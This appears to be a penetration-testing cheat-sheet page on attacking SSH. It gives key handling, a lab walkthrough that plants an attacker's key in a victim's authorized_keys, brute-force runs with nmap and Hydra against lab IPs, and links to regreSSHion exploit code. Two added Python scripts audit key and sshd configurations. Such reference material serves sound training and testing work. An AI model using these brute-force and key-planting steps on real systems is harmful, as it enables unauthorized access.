# SSH (22)

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

## Service

```
service ssh start
# Verification
netstat -antp | grep sshd
```

## Keys

### SSH Connection

```
chmod 600 id_rsa
ssh -i id_rsa user@host -p port
```

### Generate Keys

```
0xSs0rZ@pico-2018-shell:~$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/0xSs0rZ/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/0xSs0rZ/.ssh/id_rsa.
Your public key has been saved in /home/0xSs0rZ/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:YPsf7PTkrxc7owo8NkyxQVnfL3ZOS3xf+YDmJNVcMR0 0xSs0rZ@pico-2018-shell
The key's randomart image is:
+---[RSA 2048]----+
|        .o.    E=|
|       ..  . + .o|
|      o o   o +  |
|     . o + . ....|
|      . S . + ++*|
|       = . = .o**|
|        O + o  ++|
|       . B =  =  |
|          +.==.o |
+----[SHA256]-----+
0xSs0rZ@pico-2018-shell:~$ cd /home/0xSs0rZ/.ssh
0xSs0rZ@pico-2018-shell:~/.ssh$ ls
id_rsa  id_rsa.pub
0xSs0rZ@pico-2018-shell:~/.ssh$ cp id_rsa.pub ~/.ssh/authorized_keys
0xSs0rZ@pico-2018-shell:~/.ssh$ ssh -i id_rsa 0xSs0rZ@localhost
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:1/2OUR2IggrhZwLysFuJlUZ169yf1BFVeTIDW8Fo5XU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
picoCTF{quelquechose}
```

### Authorized-Keys

```
# Attacker
root@Host-001:~/Bureau/htb# cat traceback.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDsgaUFHPKR6TQf7rXuPcaSXyujJaBUvFlPWCYDeVR5adR+bHOh508cgCn9HxC79hNCPtv1a+8uRdK/0Ana1GMa35F2ugEMtHzoAjQA3zdrDRu7GS1LL/VdGqa9PMn3jKOzV1FZJrrqxqfSMhOsLXMkFJatjiSAjV0tmd8AI16p7C8nIbFmVfVHp3sLyzeB3VN6dKtFpCiWmmrdMDv5Nta9Y2FCKL20vo+dQvpfZPSPn5SzZjbpv5ITiPUdaKB2e+E4dDihuFE/VubKEWM71ns5xUPRb3DB4o5NrH8iE68/5BBUu3OT9fmo6FTUg2WsJzTZOThQQrADRNISnY9zD642pUHuT33+3JHj9XTWyojl4QYQQKENvL+rY31eGtkrvQYBXIAOvZV9KL9CNVFQb9ix5V8vCGsrG8slOpW3RaIAyJ5tm+mnWPO+P23tsdQsOudYbQE1sNdQfN/zOEqMgcfZG/3g5REqqSOAA6w0xjoJThKpYtKUvUdk2vePWA0bGb8= root@Host-001
root@Host-001:~/Bureau/htb#

# Victim
webadmin@traceback:/home/webadmin/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDsgaUFHPKR6TQf7rXuPcaSXyujJaBUvFlPWCYDeVR5adR+bHOh508cgCn9HxC79hNCPtv1a+8uRdK/0Ana1GMa35F2ugEMtHzoAjQA3zdrDRu7GS1LL/VdGqa9PMn3jKOzV1FZJrrqxqfSMhOsLXMkFJatjiSAjV0tmd8AI16p7C8nIbFmVfVHp3sLyzeB3VN6dKtFpCiWmmrdMDv5Nta9Y2FCKL20vo+dQvpfZPSPn5SzZjbpv5ITiPUdaKB2e+E4dDihuFE/VubKEWM71ns5xUPRb3DB4o5NrH8iE68/5BBUu3OT9fmo6FTUg2WsJzTZOThQQrADRNISnY9zD642pUHuT33+3JHj9XTWyojl4QYQQKENvL+rY31eGtkrvQYBXIAOvZV9KL9CNVFQb9ix5V8vCGsrG8slOpW3RaIAyJ5tm+mnWPO+P23tsdQsOudYbQE1sNdQfN/zOEqMgcfZG/3g5REqqSOAA6w0xjoJThKpYtKUvUdk2vePWA0bGb8= root@Host-001" >> authorized_keys
webadmin@traceback:/home/webadmin/.ssh$ 

# Connection
root@Host-001:~/Bureau/htb# ssh -i traceback webadmin@10.10.10.181
```
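As an added example (not part of the original page), the following Python script audits an `authorized_keys` file the way a defender reviewing a user's `.ssh` directory would: it decodes each entry, confirms the base64 blob really is the key type the line claims, and reports the RSA modulus size and comment so that unexpected or weak keys stand out. The sample file and its keys are constructed (not real keys), and the option-field handling assumes options contain no spaces.

```python
"""Audit an authorized_keys file: decode each key, confirm the wire-format type
matches the text prefix, and report RSA modulus bits. Sample keys are constructed."""
import base64
import struct
def read_string(blob, off):
    """Read one SSH wire-format string: uint32 big-endian length, then the bytes."""
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n

def parse_authorized_key(line):
    """(type, rsa_bits or None, comment) for one line; None for blank/comment lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split()
    # Optional options (command="...",no-pty) precede the type; assumes no spaces in them.
    idx = next((i for i, f in enumerate(fields) if f.startswith(("ssh-", "ecdsa-", "sk-"))), None)
    if idx is None or idx + 1 >= len(fields):
        raise ValueError("no key type/blob found: " + line[:40])
    ktype, blob = fields[idx], base64.b64decode(fields[idx + 1], validate=True)
    wire_type, off = read_string(blob, 0)
    if wire_type.decode() != ktype:   # prefix and blob must agree or sshd rejects the line
        raise ValueError(f"prefix {ktype} does not match blob type {wire_type!r}")
    bits = None
    if ktype == "ssh-rsa":
        _e, off = read_string(blob, off)  # public exponent (mpint)
        n, off = read_string(blob, off)   # modulus (mpint; may carry a leading 0x00 pad)
        bits = int.from_bytes(n, "big").bit_length()
    return ktype, bits, " ".join(fields[idx + 2:])

def audit_authorized_keys(text, min_rsa_bits=2048):
    """Return [(type, bits, comment, is_weak)] for every key line in the file."""
    report = []
    for line in text.splitlines():
        parsed = parse_authorized_key(line)
        if parsed:
            ktype, bits, comment = parsed
            report.append((ktype, bits, comment, ktype == "ssh-rsa" and bits < min_rsa_bits))
    return report

def make_rsa_blob(e, n):
    """Encode constructed RSA parameters as an ssh-rsa blob (sample data only)."""
    s = lambda b: struct.pack(">I", len(b)) + b
    mpint = lambda x: s(x.to_bytes((x.bit_length() + 8) // 8, "big"))  # 0x00 pad if MSB set
    return base64.b64encode(s(b"ssh-rsa") + mpint(e) + mpint(n)).decode()
SAMPLE = "\n".join([   # constructed file: one 3072-bit key, one legacy 1024-bit key
    "# constructed authorized_keys for the example",
    "ssh-rsa " + make_rsa_blob(65537, (1 << 3071) | 1) + " root@Host-001",
    'command="/usr/bin/uptime",no-pty ssh-rsa ' + make_rsa_blob(65537, (1 << 1023) | 1) + " legacy",
])
```

Run `audit_authorized_keys(open("/home/user/.ssh/authorized_keys").read())` against a real file to list every key with its comment and flag RSA keys below 2048 bits.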

### Pseudo-Terminal

```
ssh -t bandit18@localhost /bin/sh
```

## SSL Encryption

```
echo pass | openssl s_client -quiet -connect localhost:30001
```

## Generate key

```shell-session
ssh-keygen

Generating public/private rsa key pair.
Enter file in which to save the key (/home/parrot/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase):
Enter same passphrase again:

Your identification has been saved in /home/parrot/.ssh/id_rsa
Your public key has been saved in /home/parrot/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:...SNIP... parrot@parrot
The key's randomart image is:
+---[RSA 3072]----+
|            o..  |
|     ...SNIP     |
|     ...SNIP     |
|     ...SNIP     |
|     ...SNIP     |
|     ...SNIP     |
|     ...SNIP     |
|       + +oo+o   |
+----[SHA256]-----+
```

## SSH with a key file (`id_rsa`)

```
[Apr 06, 2024 - 07:50:27 (EDT)] exegol-CPTS /workspace # chmod 600 id_rsa
[Apr 06, 2024 - 07:52:03 (EDT)] exegol-CPTS /workspace # ssh -i id_rsa ceil@10.129.42.195
```

## Metasploit

{% embed url="https://docs.metasploit.com/docs/pentesting/metasploit-guide-ssh.html" %}

## Dangerous settings

| **Setting**                  | **Description**                                                                 |
| ---------------------------- | ------------------------------------------------------------------------------- |
| `PasswordAuthentication yes` | Allows password-based authentication.                                           |
| `PermitEmptyPasswords yes`   | Allows accounts with empty passwords to log in.                                 |
| `PermitRootLogin yes`        | Allows direct login as the root user.                                           |
| `Protocol 1`                 | Enables the obsolete SSH protocol version 1.                                    |
| `X11Forwarding yes`          | Allows X11 forwarding for GUI applications.                                     |
| `AllowTcpForwarding yes`     | Allows forwarding of TCP ports.                                                 |
| `PermitTunnel`               | Allows tun(4) device tunneling.                                                 |
| `DebianBanner yes`           | Adds the distribution package version to the SSH banner, disclosing OS details. |
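As an added example (not from the original page), this Python script checks an `sshd_config` against the table above. It applies OpenSSH's defaults to absent keywords (an unset `PasswordAuthentication` still means `yes`), honours sshd's first-value-wins rule for repeated keywords, and lists dangerous keywords that appear only inside `Match` blocks; the sample config is constructed and `Include` files are not expanded.

```python
"""Check an sshd_config for the table's dangerous settings, applying OpenSSH defaults
to absent keywords (an unset PasswordAuthentication still means "yes").
Added example; the sample config is constructed; Include files are not expanded."""
import re

# keyword -> (values treated as dangerous, OpenSSH default when the keyword is absent)
DANGEROUS = {
    "passwordauthentication": ({"yes"}, "yes"),
    "permitemptypasswords": ({"yes"}, "no"),
    "permitrootlogin": ({"yes"}, "prohibit-password"),  # default since OpenSSH 7.0
    "protocol": ({"1", "1,2", "2,1"}, "2"),
    "x11forwarding": ({"yes"}, "no"),
    "allowtcpforwarding": ({"yes", "all", "local", "remote"}, "yes"),
    "permittunnel": ({"yes", "point-to-point", "ethernet"}, "no"),
    "debianbanner": ({"yes"}, "yes"),  # Debian/Ubuntu builds: on unless disabled
}
def parse_sshd_config(text):
    """Return (top-level settings, keywords seen inside Match blocks). sshd keeps
    the FIRST value of a repeated keyword, so a later duplicate never overrides."""
    settings, match_keys, in_match = {}, [], False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # strip comments and whitespace
        if not line:
            continue
        m = re.match(r"(\S+?)(?:\s*=\s*|\s+|$)(.*)", line)   # "Key value" or "Key=value"
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            in_match = True        # everything below applies only to matching sessions
        elif in_match:
            match_keys.append(key)
        else:
            settings.setdefault(key, value)
    return settings, match_keys
def audit_sshd_config(text):
    """Return ([(keyword, effective value, 'explicit'|'default')], [keywords set only in Match])."""
    settings, match_keys = parse_sshd_config(text)
    findings = []
    for key, (risky, default) in DANGEROUS.items():
        value = settings.get(key, default).lower()
        if value in risky:
            findings.append((key, value, "explicit" if key in settings else "default"))
    return findings, sorted(set(match_keys) & set(DANGEROUS))
SAMPLE = """# constructed sshd_config fragment for the example
PermitRootLogin yes
PasswordAuthentication no
PasswordAuthentication yes    # ignored: sshd keeps the first occurrence
X11Forwarding=yes
Match User backup
    AllowTcpForwarding no
"""
```

On a live host, feed it the output of `sshd -T` (the effective configuration) rather than the raw file to avoid the `Include` and `Match` limitations.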

## CVE-2025-26465

The OpenSSH client, from version 6.8p1 through 9.9p1 (inclusive), contains a logic error that makes it vulnerable to an active machine-in-the-middle attack when the `VerifyHostKeyDNS` option is enabled.

{% embed url="https://github.com/rxerium/CVE-2025-26465" %}

```
nuclei -u yourHost.com -t template.yaml
```

## CVE-2024-6387 - regreSSHion

Remote code execution in the OpenSSH server (sshd).

{% embed url="https://github.com/anhvutuan/CVE-2024-6387-poc-1" %}

{% embed url="https://github.com/xaitax/CVE-2024-6387_Check" %}

{% embed url="https://github.com/asterictnl-lvdw/CVE-2024-6387" %}

{% embed url="https://github.com/YassDEV221608/CVE-2024-6387_PoC" %}

## SSH Audit

```shell-session
$ git clone https://github.com/jtesta/ssh-audit.git && cd ssh-audit
$ ./ssh-audit.py 10.129.14.132
```

## SSHamble

```
$ ./sshamble scan -o results.jsonl 192.168.0.0/24
$ ./sshamble analyze -o results-directory results.jsonl
```

{% embed url="https://github.com/runZeroInc/sshamble" %}

## Change Authentication Method

```shell-session
$ ssh -v cry0l1t3@10.129.14.132

OpenSSH_8.2p1 Ubuntu-4ubuntu0.3, OpenSSL 1.1.1f  31 Mar 2020
debug1: Reading configuration data /etc/ssh/ssh_config 
...SNIP...
debug1: Authentications that can continue: publickey,password,keyboard-interactive
```

For potential brute-force attacks, we can specify the authentication method with the SSH client option `PreferredAuthentications`.

```shell-session
$ ssh -v cry0l1t3@10.129.14.132 -o PreferredAuthentications=password

OpenSSH_8.2p1 Ubuntu-4ubuntu0.3, OpenSSL 1.1.1f  31 Mar 2020
debug1: Reading configuration data /etc/ssh/ssh_config
...SNIP...
debug1: Authentications that can continue: publickey,password,keyboard-interactive
debug1: Next authentication method: password

cry0l1t3@10.129.14.132's password:
```

## Bruteforce

{% content-ref url="/pages/JjwH2toJ8671TszdXENs" %}
[SSH Bruteforce](/0xss0rz/pentest/brute-force/ssh-bruteforce.md)
{% endcontent-ref %}

### Nmap

```
[Apr 06, 2024 - 10:09:33 (EDT)] exegol-CPTS /workspace # nmap 10.129.202.20 -sV -p22 --script ssh-brute
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-06 10:09 EDT
NSE: [ssh-brute] Trying username/password pair: root:root
NSE: [ssh-brute] Trying username/password pair: admin:admin
NSE: [ssh-brute] Trying username/password pair: administrator:administrator
NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
NSE: [ssh-brute] Trying username/password pair: guest:guest
NSE: [ssh-brute] Trying username/password pair: user:user
NSE: [ssh-brute] Trying username/password pair: web:web
NSE: [ssh-brute] Trying username/password pair: test:test
NSE: [ssh-brute] Trying username/password pair: root:
NSE: [ssh-brute] Trying username/password pair: admin:
NSE: [ssh-brute] Trying username/password pair: administrator:
NSE: [ssh-brute] Trying username/password pair: webadmin:
```

### Hydra (see [Brute force - SSH](/0xss0rz/pentest/brute-force/ssh-bruteforce.md))

```shell-session
$ hydra -L user.list -P password.list ssh://10.129.42.197

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-10 15:03:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://10.129.42.197:22/
[22][ssh] host: 10.129.42.197   login: user   password: password
1 of 1 target successfully completed, 1 valid password found
```

## SSH on Windows

Binaries:

{% embed url="https://github.com/PowerShell/Win32-OpenSSH" %}

Install SSH on Windows:

{% embed url="https://winscp.net/eng/docs/guide_windows_openssh_server" %}

## Execute command - Windows

{% embed url="https://lolbas-project.github.io/lolbas/Binaries/Ssh/" %}


## Interesting Books

{% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %}
[Interesting Books](/0xss0rz/interesting-books.md)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**Nmap Network Scanning**](https://www.amazon.fr/dp/0979958717?tag=0xss0rz-21)\
  The official guide to the Nmap Security Scanner, a free and open source utility used by millions of people for network discovery, administration, and security auditing. From explaining port scanning basics for novices to detailing low-level packet crafting methods used by advanced hackers, this book by Nmap's original author suits all levels of security and networking professionals.
* [**The Art of Network Penetration Testing**](https://www.amazon.fr/dp/1617296821)\
  A guide to simulating an internal security breach. You’ll take on the role of the attacker and work through every stage of a professional pentest, from information gathering to seizing control of a system and owning the network.
* [**Network Basics for Hackers**](https://www.amazon.fr/dp/B0BS3GZ1R9)\
  The book offers one of the most complete and in-depth analyses of Wi-Fi and Bluetooth networks, then progresses through the various protocols such as DNS, ARP, SMTP, and others.

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)
